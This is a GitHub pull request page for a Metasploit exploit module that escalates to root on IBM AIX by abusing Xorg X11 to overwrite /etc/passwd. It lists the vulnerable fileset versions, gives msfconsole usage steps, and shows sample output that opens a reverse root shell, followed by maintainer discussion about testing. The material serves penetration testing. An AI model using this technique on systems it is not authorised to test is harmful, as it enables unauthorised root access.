Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit module for Xorg X11 Server Local Privilege Escalation on AIX #11390

Merged
merged 9 commits into from Nov 11, 2019

Conversation

@dzflack
Copy link
Contributor

dzflack commented Feb 12, 2019

Add Xorg X11 Server Local Privilege Escalation module for AIX.

This module adds the ability to escalate privileges on AIX by overwriting /etc/passwd using Xorg.

I felt the differences between the existing xorg multi exploit and this module warranted the addition of a new module as opposed to modifying the existing one.

The differences include:

  • Use of different Xorg parameter
  • Method of escalation (overwriting /etc/passwd instead of crontab. doing this because the file to be overwritten has to be accessible by an unprivileged user; which the crontab is not on AIX)
  • Payload type (only simple cmd perl payloads supported)

Vulnerable Applications

This module has been tested successfully on:

  • AIX 7.1 with Xorg 7.2.3.0
  • AIX 7.2 with Xorg 7.2.3.0

This table lists all vulnerable Xorg fileset versions (as documented by IBM) :

Lower Level Upper Level
6.1.9.0 6.1.9.100
7.1.4.0 7.1.4.30
7.1.5.0 7.1.5.31
7.2.0.0 7.2.0.1
7.2.1.0 7.2.1.0
7.2.2.0 7.2.2.0
7.2.3.0 7.2.3.15

Verification Steps

  1. msfconsole
  2. Get a session
  3. use exploit/aix/local/xorg_x11_server
  4. set session <session>
  5. set LHOST <lhost>
  6. set LPORT <lport>
  7. set writabledir <writabledir>
  8. run
  9. Verify you get a root session

Example Output

msf5 exploit(aix/local/xorg_x11_server) > set session 1
session => 1
msf5 exploit(aix/local/xorg_x11_server) > set writabledir /tmp
writabledir => /tmp
msf5 exploit(aix/local/xorg_x11_server) > run

[*] Started reverse TCP handler on 0.0.0.0:8888
[*] Xorg version is 7.2.3.0
[*] Retrieving currently logged in users
[*] Writing to /tmp/wow.ksh
[*] Backing up /etc/passwd to /tmp/passwd.backup
[*] Executing /tmp/wow.ksh
[*] Checking if we are root
[+] Got root!
[*] Writing to /tmp/wowee.ksh
[*] Executing shell payload
[*] Restoring original /etc/passwd
[*] Command shell session 2 opened (172.17.0.2:8888 -> 172.17.0.1:32948) at 2019-02-11 15:42:56 +0000
[+] Deleted /tmp/wow.ksh
[+] Deleted /tmp/passwd.backup
[+] Deleted /tmp/wowee.ksh

id
uid=0(root) gid=0(system)

@dzflack

This comment has been minimized.

Copy link
Contributor Author

dzflack commented Mar 4, 2019

Hiya @bcoles , anything I can help out further on this PR?

@aringo

This comment has been minimized.

Copy link
Contributor

aringo commented Mar 29, 2019

I had been messing around with the modulepath way of exploiting this before I got busy on other things and I was about to go back to it. Does the method work for AIX ? It's in an earlier PR - #11025 It works on Solaris and Centos with SELINUX enforcing (doesn't overwrite a core file). Can you let me know where you got an AIX box ?

@dzflack

This comment has been minimized.

Copy link
Contributor Author

dzflack commented Apr 12, 2019

@aringo I did initially try the moduelpath method when targeting AIX, however I could not get it to work (Can't remember the specifics of why). Getting the file override method to work did take a fair bit of tweaking on AIX, due to some AIX specific quirks.
I got access to an AIX box through my employer.

@aringo

This comment has been minimized.

Copy link
Contributor

aringo commented Apr 12, 2019

Did you want to include this into the first module since it's multi? Make selecting password an option and auto for AIX. Sometimes stuff sits for a while if the testers don't have access to the OS/software setup. I'm very jealous about the AIX access as I had looked at renting an account or buying a system on ebay, way more money than I was comfortable with. Wanted to do things like work through this blog post https://rhinosecuritylabs.com/research/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ and try to make a module for it - there is a POC - if you are interested.

@dzflack

This comment has been minimized.

Copy link
Contributor Author

dzflack commented Apr 15, 2019

I originally thought it was best to have it in a seperate module as pretty much all the logic is focused on AIX specific quirks:

  • Different Xorg parameter used
  • Vulnerable versions of the binary are different
  • /etc/passwd is overwritten as the crontab is inaccessible
  • A newline is injected when overwriting /etc/passwd
  • All currently logged in users need to be included when overwriting /etc/passwd

However it looks like this PR might be dead, so if you believe that it will help get the code landed, and the above fits in with your module, then go ahead.

Yep I did rent an AIX box for a couple of days when validating that the module worked on both AIX 7.1 and 7.2; the site I used was SiteOx. They seemed to be fairly legit, but be as cautious as you usually are when giving a random website your credit card details ¯\(ツ)

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Apr 17, 2019

However it looks like this PR might be dead

PR isn't dead, just sleeping, likely due to no-one having an AIX box to test, and lack of developer time.

@dzflack

This comment has been minimized.

Copy link
Contributor Author

dzflack commented Apr 22, 2019

PR isn't dead, just sleeping, likely due to no-one having an AIX box to test, and lack of developer time.

That's understandable. If I was potentially able to obtain once off access to an AIX box for testing, would you be willing to take the reins on this one?

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Sep 18, 2019

@dzflack I'll take on landing this, but I will ask a couple favors:

  1. You have the warning about /etc/password damage in the bottom half of the docs. Please put it near the top; possibly even the first line as a warning.
  2. If you can, please send a screen video of it working. Something like shareX or other application will work fine.
@bwatters-r7 bwatters-r7 self-assigned this Sep 18, 2019
@dzflack

This comment has been minimized.

Copy link
Contributor Author

dzflack commented Sep 20, 2019

@bwatters-r7 thanks for picking this up. I have added the warning as requested, please let me know if its suitable or if you want me to add more about the actual consequences.

Unfortunately I no longer have access to an AIX box as I have recently changed employer. If a screen capture of the exploit successfully executing is definitely needed, I could rent access to an AIX box; however this will cost $20 for a couple minutes of use, so am not too keen on that if it can be avoided :P

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Oct 24, 2019

I'm going to try our snazzy "needs-testing" label to see if someone in the community can verify this..... @ccondon-r7 ;-)

@dzflack

This comment has been minimized.

Copy link
Contributor Author

dzflack commented Nov 10, 2019

@bwatters-r7 I went ahead and rented an AIX box to demonstrate the module working; please see the link below for recording. I'll have access to the box for the next 24 hours, and am happy to share the access if you were wanting to test the module yourself?

Vimeo Module Demo

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 10, 2019

This vimeo video would be a good thing to post in the module docs btw

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Nov 11, 2019

@dzflack Thanks! I'm going to do a few tweaks on the documentation and module hash, but I should be able to get this through today! No need to share access, the video is great.

bwatters-r7 added a commit that referenced this pull request Nov 11, 2019
…scalation on AIX

Merge branch 'land-11390' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 7ea19c7 into rapid7:master Nov 11, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Nov 11, 2019

I did a quick add of the video and SideEffects while landing.

msjenkins-r7 added a commit that referenced this pull request Nov 11, 2019
…scalation on AIX

Merge branch 'land-11390' into upstream-master
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Nov 11, 2019

Release Notes

This PR adds an privilege escalation exploit module targeting the Xorg11 server on some AIX versions. It is similar to our existing generic Xorg11 SUID exploit module, but there are a few tweaks that make this module work with AIX in particular.

@dzflack

This comment has been minimized.

Copy link
Contributor Author

dzflack commented Nov 12, 2019

Awesome! Thanks for getting this landed @bwatters-r7.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.